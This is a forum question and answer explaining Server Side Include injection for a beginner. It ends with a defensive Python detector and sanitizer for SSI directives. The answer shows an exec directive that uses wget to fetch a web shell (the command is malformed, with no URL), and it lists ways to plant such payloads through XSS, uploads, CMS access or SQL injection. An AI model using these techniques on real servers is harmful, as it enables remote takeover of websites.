Server Side Injection Issues
I am doing an online training and I have to know about server side injections.

Could someone please refer me to a GOOD online tutorial that explains SSI in depth for a beginner?



From what I understand, Server-side Injection is based on exploiting SSI (Server Side Includes; a simple interpreted server-side scripting language used almost exclusively for the Web).

So I think it can easily be seen as some sort of dynamic HTML based on the server-side instead of client-side. It uses one of the extensions like .shtml, .shtm, .stm, and the webserver has to be configured to allow SSI.

For example, blog.shtml contains the following:
<!--#include virtual="../quote.txt" -->
Which includes a daily quotation. With one change to the file, all the files including blog.shtml will change their content too.

You should read more here:

So you can try to change code or add your own code to the SSI enabled pages to exploit it. Like:
<!--#exec cmd="wget | rename shell.txt shell.php" -->
Spawning a shell and such.

You should read more on owasp:

As for how you manage to change or add code, you just need to look for ways to manipulate the page, through other vulnerabilities or otherwise. For example:
* Persistent XSS.
* If there are any page uploads without proper sanitizing, you can try uploading a shell or .shtml file payload.
* Maybe get into their CMS/admin/cpanel where you can add new pages or posts.
* Or maybe you've found an SQL injection vulnerability; you can try to insert a new page, post or content into the page.

Just need to think outside the box I guess. Also, for the record, for any questions on how attacks work, I highly recommend you read the OWASP wiki on it.
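
A defensive check for the injection paths listed in the answer above (an added example, not part of the original post): it finds SSI directives in user-supplied content, flags uploads that use the extensions mentioned, and HTML-escapes directives before they reach an SSI-enabled page. The function names and the severity ranking are assumptions made for this illustration.

```python
import html
import re

# <!--#element attr="value" ... -->, the directive shape used in the post above.
DIRECTIVE = re.compile(r"<!--\s*#\s*([A-Za-z]+)(.*?)-->", re.DOTALL)
ATTRIBUTE = re.compile(r"([A-Za-z]+)\s*=\s*([\"'`])(.*?)\2", re.DOTALL)

SSI_EXTENSIONS = (".shtml", ".shtm", ".stm")   # extensions named in the post
# Assumed ranking for triage: exec runs commands, include reads other files.
SEVERITY = {"exec": "high", "include": "medium"}


def find_directives(text):
    """Return every SSI directive in text with its attributes and severity."""
    found = []
    for match in DIRECTIVE.finditer(text):
        name = match.group(1).lower()
        attrs = {k.lower(): v for k, _, v in ATTRIBUTE.findall(match.group(2))}
        found.append({"name": name, "attrs": attrs,
                      "severity": SEVERITY.get(name, "low"),
                      "raw": match.group(0)})
    return found


def neutralize(text):
    """HTML-escape each directive so an SSI-enabled server emits it as text."""
    return DIRECTIVE.sub(lambda m: html.escape(m.group(0)), text)


def audit_upload(filename, content):
    """List the reasons an upload should be rejected; empty list means clean."""
    reasons = []
    if filename.lower().endswith(SSI_EXTENSIONS):
        reasons.append("ssi-extension")
    reasons += [f"directive:{d['name']}:{d['severity']}"
                for d in find_directives(content)]
    return reasons


# Constructed sample: a stored comment carrying the two directives quoted above.
SAMPLE = ('Nice post! <!--#include virtual="../quote.txt" --> '
          '<!--#exec cmd="wget | rename shell.txt shell.php" -->')

if __name__ == "__main__":
    for d in find_directives(SAMPLE):
        print(d["severity"], d["name"], d["attrs"])
    print(neutralize(SAMPLE))
    print(audit_upload("notes.SHTML", SAMPLE))
```

Escaping on output only helps for content that must be stored and displayed; uploads that trip `audit_upload` are better rejected outright.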
